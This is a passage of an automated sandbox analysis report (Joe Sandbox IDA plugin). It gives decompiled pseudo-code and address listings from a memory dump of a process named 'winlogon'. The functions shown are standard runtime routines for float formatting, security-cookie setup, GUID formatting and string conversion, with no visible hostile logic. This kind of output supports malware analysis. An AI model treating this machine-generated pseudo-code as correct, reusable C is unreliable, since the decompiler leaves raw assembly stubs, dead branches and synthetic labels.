    0x00d6c9c3
    0x00d6c9ca
    0x00d6c9d1
    0x00d6c9d4
    0x00000000
    0x00000000
    0x00d6c9d4
    0x00d6ca0e
    0x00d6ca0e
    0x00d6ca11
    0x00d6ca12
    0x00d6ca15
    0x00d6ca18
    0x00d6c9a9
    0x00000000
    0x00d6c9a1
    0x00d6c933
    0x00d6c935
    0x00d6c93b
    0x00d6c945
    0x00000000
    0x00d6c957
    0x00d6c968
    0x00d6c96d
    0x00d6c972
    0x00d6ca1c
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6c972
    0x00d6c945
    0x00d6c931

    APIs
      • Part of subcall function 00D6DA88: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D71869
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,?,?,00D869CC), ref: 00D6C935
    • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 00D6C991
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D740A9, Relevance: 6.3, APIs: 4, Instructions: 305
    C-Code - Quality: 75%
    			E00D740A9(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00D6E412(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00D7D930( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00D7D930( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00D6D520(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00D7D930( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00D7D7E0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00D7D7E0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00D7D7E0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00D743AC(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00D7E060(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E00D72122();
					_t183 = 0x22;
					 *_t129 = _t183;
					E00D70269();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































    0x00d740a9
    0x00d740b4
    0x00d740bb
    0x00d740bd
    0x00d740bd
    0x00d740bf
    0x00d740c8
    0x00d740ca
    0x00d740cf
    0x00d740d5
    0x00d740eb
    0x00d740f0
    0x00d740f3
    0x00d74100
    0x00d74105
    0x00d74159
    0x00d74161
    0x00d74163
    0x00d74165
    0x00d74168
    0x00d74168
    0x00d74168
    0x00d7416e
    0x00d74176
    0x00d74189
    0x00d7418c
    0x00d7418e
    0x00d74191
    0x00d74192
    0x00d741b3
    0x00d741b6
    0x00d741b6
    0x00d74194
    0x00d74194
    0x00d74196
    0x00d741a1
    0x00d741a1
    0x00d741a3
    0x00d741aa
    0x00d741a5
    0x00d741a5
    0x00d741a5
    0x00d741a3
    0x00d741b7
    0x00d741b9
    0x00d741ba
    0x00d741bd
    0x00d741bf
    0x00d741c9
    0x00d741d3
    0x00d741c1
    0x00d741c1
    0x00d741c1
    0x00d741d8
    0x00d741d8
    0x00d741dd
    0x00d741e0
    0x00d741eb
    0x00d741eb
    0x00d741eb
    0x00d741eb
    0x00d741ef
    0x00d741f6
    0x00d741f7
    0x00d741fa
    0x00d741fd
    0x00d741fd
    0x00d741ff
    0x00000000
    0x00000000
    0x00d74217
    0x00d7421e
    0x00d74222
    0x00d74225
    0x00d74228
    0x00d7422a
    0x00d7422a
    0x00d7422a
    0x00d7422c
    0x00d7422f
    0x00d74232
    0x00d74234
    0x00d7423c
    0x00d74242
    0x00d74245
    0x00d74248
    0x00d74249
    0x00d7424c
    0x00d7424f
    0x00d7424f
    0x00d74254
    0x00d74257
    0x00000000
    0x00000000
    0x00d7426f
    0x00d74274
    0x00d74278
    0x00000000
    0x00000000
    0x00d7427c
    0x00d7427f
    0x00d74280
    0x00d74280
    0x00d74282
    0x00d74285
    0x00000000
    0x00000000
    0x00d74287
    0x00d7428a
    0x00d74291
    0x00d74294
    0x00d74297
    0x00d742ad
    0x00d742ad
    0x00d742ad
    0x00d74299
    0x00d74299
    0x00d7429b
    0x00d7429e
    0x00d742a9
    0x00d742a0
    0x00d742a3
    0x00d742a3
    0x00d7429e
    0x00000000
    0x00d74297
    0x00d7428c
    0x00d7428c
    0x00d7428e
    0x00d7428e
    0x00d741e2
    0x00d741e2
    0x00d741e5
    0x00d742b0
    0x00d742b0
    0x00d742b2
    0x00d742b4
    0x00d742b7
    0x00d742b8
    0x00d742b9
    0x00d742ba
    0x00d742c2
    0x00d742c2
    0x00d742c2
    0x00d742c4
    0x00d742c7
    0x00d742ca
    0x00d742cc
    0x00d742cc
    0x00d742ce
    0x00d742e0
    0x00d742e4
    0x00d742e7
    0x00d742ee
    0x00d742f6
    0x00d742f6
    0x00d742f9
    0x00d742fb
    0x00d7430c
    0x00d7430c
    0x00d74310
    0x00d74310
    0x00d74313
    0x00d74315
    0x00d74318
    0x00000000
    0x00d742fd
    0x00d742fd
    0x00d74303
    0x00d74303
    0x00d74307
    0x00d7431a
    0x00d7431a
    0x00d7431e
    0x00d7431f
    0x00d74321
    0x00d74323
    0x00d74364
    0x00d74364
    0x00d74366
    0x00d74373
    0x00d74373
    0x00d74375
    0x00d74377
    0x00d74378
    0x00d74379
    0x00d74380
    0x00d74383
    0x00d74385
    0x00d74385
    0x00d74386
    0x00d74388
    0x00d7438b
    0x00d7438b
    0x00d7438d
    0x00d7438f
    0x00000000
    0x00d7438f
    0x00d74368
    0x00d7436a
    0x00000000
    0x00000000
    0x00d7436c
    0x00000000
    0x00000000
    0x00d7436e
    0x00d74371
    0x00000000
    0x00000000
    0x00000000
    0x00d74371
    0x00d7432a
    0x00d74330
    0x00d74330
    0x00d74332
    0x00d74333
    0x00d74334
    0x00d74335
    0x00d7433c
    0x00d7433f
    0x00d74341
    0x00d74342
    0x00d74344
    0x00d74351
    0x00d74351
    0x00d74353
    0x00d74355
    0x00d74356
    0x00d74357
    0x00d7435e
    0x00d74361
    0x00d74363
    0x00d74363
    0x00000000
    0x00d74363
    0x00d74346
    0x00d74346
    0x00d74348
    0x00000000
    0x00000000
    0x00d7434a
    0x00000000
    0x00000000
    0x00d7434c
    0x00d7434f
    0x00000000
    0x00000000
    0x00000000
    0x00d7434f
    0x00d7432c
    0x00d7432e
    0x00000000
    0x00000000
    0x00000000
    0x00d7432e
    0x00d742ff
    0x00d74301
    0x00000000
    0x00000000
    0x00000000
    0x00d74301
    0x00d742fb
    0x00000000
    0x00d741e5
    0x00d741e0
    0x00d74107
    0x00d74109
    0x00000000
    0x00d7410b
    0x00d74121
    0x00d74126
    0x00d74128
    0x00d74134
    0x00d7413a
    0x00d7413b
    0x00d7413d
    0x00d7413f
    0x00d7414a
    0x00d7414a
    0x00d7414d
    0x00d7414f
    0x00d7414f
    0x00d74152
    0x00d7412a
    0x00d7412a
    0x00d7412a
    0x00000000
    0x00d74128
    0x00d740d7
    0x00d740d7
    0x00d740de
    0x00d740df
    0x00d740e1
    0x00d74393
    0x00d74397
    0x00d7439c
    0x00d7439c
    0x00d743ab
    0x00d743ab

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6B2F5, Relevance: 6.1, APIs: 4, Instructions: 53timethread
    C-Code - Quality: 100%
    			E00D6B2F5() {
				signed int _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t21;
				signed int _t29;
				signed int _t32;
				signed int _t36;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t21 =  *0xd88004; // 0x276b9783
				if(_t21 == 0xbb40e64e || (0xffff0000 & _t21) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = _v8 ^ GetCurrentProcessId();
					QueryPerformanceCounter( &_v24);
					_t29 =  &_v8;
					_t36 = _v20 ^ _v24.LowPart ^ _v8 ^ _t29;
					if(_t36 != 0xbb40e64e) {
						if((0xffff0000 & _t36) == 0) {
							_t29 = (_t36 | 0x00004711) << 0x10;
							_t36 = _t36 | _t29;
						}
					} else {
						_t36 = 0xbb40e64f;
					}
					 *0xd88004 = _t36;
					 *0xd88000 =  !_t36;
					return _t29;
				} else {
					_t32 =  !_t21;
					 *0xd88000 = _t32;
					return _t32;
				}
			}











    0x00d6b2fb
    0x00d6b2ff
    0x00d6b303
    0x00d6b316
    0x00d6b329
    0x00d6b335
    0x00d6b33e
    0x00d6b347
    0x00d6b34e
    0x00d6b357
    0x00d6b360
    0x00d6b364
    0x00d6b36f
    0x00d6b378
    0x00d6b37b
    0x00d6b37b
    0x00d6b366
    0x00d6b366
    0x00d6b366
    0x00d6b37d
    0x00d6b385
    0x00000000
    0x00d6b31c
    0x00d6b31c
    0x00d6b31e
    0x00000000
    0x00d6b31e

    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00D6B329
    • GetCurrentThreadId.KERNEL32 ref: 00D6B338
    • GetCurrentProcessId.KERNEL32 ref: 00D6B341
    • QueryPerformanceCounter.KERNEL32(?), ref: 00D6B34E
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D63B90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149
    C-Code - Quality: 79%
    			E00D63B90(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v276;
				char _v532;
				void* _v536;
				void* _v540;
				intOrPtr _v544;
				struct _CRITICAL_SECTION _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				void* __ebp;
				signed int _t39;
				signed int _t40;
				void _t52;
				void _t53;
				void* _t56;
				void* _t57;
				void* _t58;
				unsigned int _t59;
				signed int _t60;
				void* _t62;
				signed int _t70;
				intOrPtr _t71;
				signed int _t83;
				void _t88;
				void _t89;
				signed int _t91;
				void* _t99;
				signed int _t100;
				char _t104;
				void* _t106;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t122;
				signed int _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t129;

				_push(0xffffffff);
				_push(E00D7E26B);
				_push( *[fs:0x0]);
				_t126 = _t125 - 0x234;
				_t39 =  *0xd88004; // 0x276b9783
				_t40 = _t39 ^ _t124;
				_v20 = _t40;
				_push(__ebx);
				_push(__edi);
				_push(_t40);
				 *[fs:0x0] =  &_v16;
				_t118 = __edx;
				_v544 = __ecx;
				if(__ecx != 0 && __edx != 0) {
					_v580 = 0;
					_v572 = 0;
					_v576 = 0;
					InitializeCriticalSection( &_v568);
					_v8 = 0;
					E00D636A0(__ebx,  &_v580, _t118, __edi, _t118);
					_t104 = _v580;
					_t70 = _v576 - _t104 >> 9;
					if(_t70 == 0) {
						L24:
						_v576 = _t104;
						DeleteCriticalSection( &_v568);
						E00D68340(_t70,  &_v580, _t104);
					} else {
						_t120 = 0;
						_v540 = 0;
						if(_t70 != 0) {
							_v536 = 0;
							asm("o16 nop [eax+eax]");
							do {
								E00D6D520(_t104,  &_v532, 0, 0x200);
								_t127 = _t126 + 0xc;
								if(_t120 > 0xffffff || _t120 >= _t70) {
									_t99 = 0;
									goto L10;
								} else {
									if(_t70 <= _t120) {
										L25:
										E00D6B97B("invalid vector<T> subscript");
										goto L26;
									} else {
										_t99 = _v536 + _t104;
										L10:
										_t121 = _t99;
										do {
											_t52 =  *_t99;
											_t99 = _t99 + 1;
										} while (_t52 != 0);
										_t100 = _t99 - _t121;
										_t106 =  &_v532 - 1;
										do {
											_t53 =  *(_t106 + 1);
											_t106 = _t106 + 1;
										} while (_t53 != 0);
										_t83 = _t100 >> 2;
										memcpy(_t106, _t121, _t83 << 2);
										_t56 = memcpy(_t121 + _t83 + _t83, _t121, _t100 & 0x00000003);
										_t129 = _t127 + 0x18;
										if(_t56 > 0xffffff || _t56 >= _t70) {
											_t71 = _v536;
											_t57 = 0;
											goto L19;
										} else {
											if(_t70 <= _t56) {
												goto L25;
											} else {
												_t71 = _v536;
												_t57 = _v580 + _t71;
												L19:
												_t58 = _t57 + 0x100;
												_t122 = _t58;
												do {
													_t88 =  *_t58;
													_t58 = _t58 + 1;
												} while (_t88 != 0);
												_t59 = _t58 - _t122;
												_t112 =  &_v276 - 1;
												do {
													_t89 =  *(_t112 + 1);
													_t112 = _t112 + 1;
												} while (_t89 != 0);
												goto L23;
											}
										}
									}
								}
								goto L27;
								L23:
								_t91 = _t59 >> 2;
								_t60 = memcpy(_t112, _t122, _t91 << 2);
								_t94 = _t60 & 0x00000003;
								_t62 = memcpy(_t122 + _t91 + _t91, _t122, _t60 & 0x00000003);
								_t126 = _t129 + 0x18;
								E00D62540(_t71, _v544, _t122 + (_t60 & 0x00000003) + _t94, _t62);
								_t104 = _v580;
								_t120 = _v540 + 1;
								_v536 = _t71 + 0x200;
								_v540 = _t120;
								_t70 = _v576 - _t104 >> 9;
							} while (_t120 < _t70);
						}
						goto L24;
					}
				}
				L27:
				 *[fs:0x0] = _v16;
				return E00D6ABE4(_v20 ^ _t124);
			}














































    0x00d63b93
    0x00d63b95
    0x00d63ba0
    0x00d63ba1
    0x00d63ba7
    0x00d63bac
    0x00d63bae
    0x00d63bb1
    0x00d63bb3
    0x00d63bb4
    0x00d63bb8
    0x00d63bbe
    0x00d63bc2
    0x00d63bca
    0x00d63bde
    0x00d63be9
    0x00d63bf3
    0x00d63bfd
    0x00d63c05
    0x00d63c12
    0x00d63c1d
    0x00d63c25
    0x00d63c2a
    0x00d63d50
    0x00d63d56
    0x00d63d5d
    0x00d63d69
    0x00d63c30
    0x00d63c30
    0x00d63c32
    0x00d63c3a
    0x00d63c40
    0x00d63c46
    0x00d63c50
    0x00d63c5e
    0x00d63c63
    0x00d63c6c
    0x00d63c84
    0x00000000
    0x00d63c72
    0x00d63c74
    0x00d63d75
    0x00d63d7a
    0x00000000
    0x00d63c7a
    0x00d63c80
    0x00d63c86
    0x00d63c86
    0x00d63c88
    0x00d63c88
    0x00d63c8a
    0x00d63c8b
    0x00d63c95
    0x00d63c97
    0x00d63c98
    0x00d63c98
    0x00d63c9b
    0x00d63c9c
    0x00d63ca8
    0x00d63cab
    0x00d63cb2
    0x00d63cb2
    0x00d63cb9
    0x00d63cd7
    0x00d63cdd
    0x00000000
    0x00d63cbf
    0x00d63cc1
    0x00000000
    0x00d63cc7
    0x00d63ccd
    0x00d63cd3
    0x00d63cdf
    0x00d63cdf
    0x00d63ce4
    0x00d63ce6
    0x00d63ce6
    0x00d63ce8
    0x00d63ce9
    0x00d63cf3
    0x00d63cf5
    0x00d63cf6
    0x00d63cf6
    0x00d63cf9
    0x00d63cfa
    0x00000000
    0x00d63cf6
    0x00d63cc1
    0x00d63cb9
    0x00d63c74
    0x00000000
    0x00d63cfe
    0x00d63d00
    0x00d63d03
    0x00d63d0d
    0x00d63d10
    0x00d63d10
    0x00d63d19
    0x00d63d2a
    0x00d63d30
    0x00d63d31
    0x00d63d3f
    0x00d63d45
    0x00d63d48
    0x00d63c50
    0x00000000
    0x00d63c3a
    0x00d63c2a
    0x00d63d81
    0x00d63d84
    0x00d63d9c

    APIs
    • InitializeCriticalSection.KERNEL32(?,276B9783), ref: 00D63BFD
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63855
      • Part of subcall function 00D636A0: __Stoull.NTSTC_LIBCMT ref: 00D63872
    • DeleteCriticalSection.KERNEL32(?), ref: 00D63D5D
      • Part of subcall function 00D6B97B: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D6B987
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    • invalid vector<T> subscript, xrefs: 00D63D75
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6AB90, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
    C-Code - Quality: 100%
    			E00D6AB90(intOrPtr* __ecx, WCHAR* __edx) {

				if(__ecx == 0 || __edx == 0) {
					return 0;
				} else {
					wsprintfW(__edx, L"%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X",  *__ecx,  *(__ecx + 4) & 0x0000ffff,  *(__ecx + 6) & 0x0000ffff,  *(__ecx + 8) & 0x000000ff,  *(__ecx + 9) & 0x000000ff,  *(__ecx + 0xa) & 0x000000ff,  *(__ecx + 0xb) & 0x000000ff,  *(__ecx + 0xc) & 0x000000ff,  *(__ecx + 0xd) & 0x000000ff,  *(__ecx + 0xe) & 0x000000ff,  *(__ecx + 0xf) & 0x000000ff);
					return 1;
				}
			}



    0x00d6ab92
    0x00d6abe3
    0x00d6ab98
    0x00d6abd2
    0x00d6abe0
    0x00d6abe0

    APIs
    Strings
    • %08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X, xrefs: 00D6ABCC
    • =B?w, xrefs: 00D6ABD2
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6E495, Relevance: 5.1, APIs: 4, Instructions: 139
    C-Code - Quality: 100%
    			E00D6E495(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E00D6E412(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00D72122())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x801
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00D72122())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
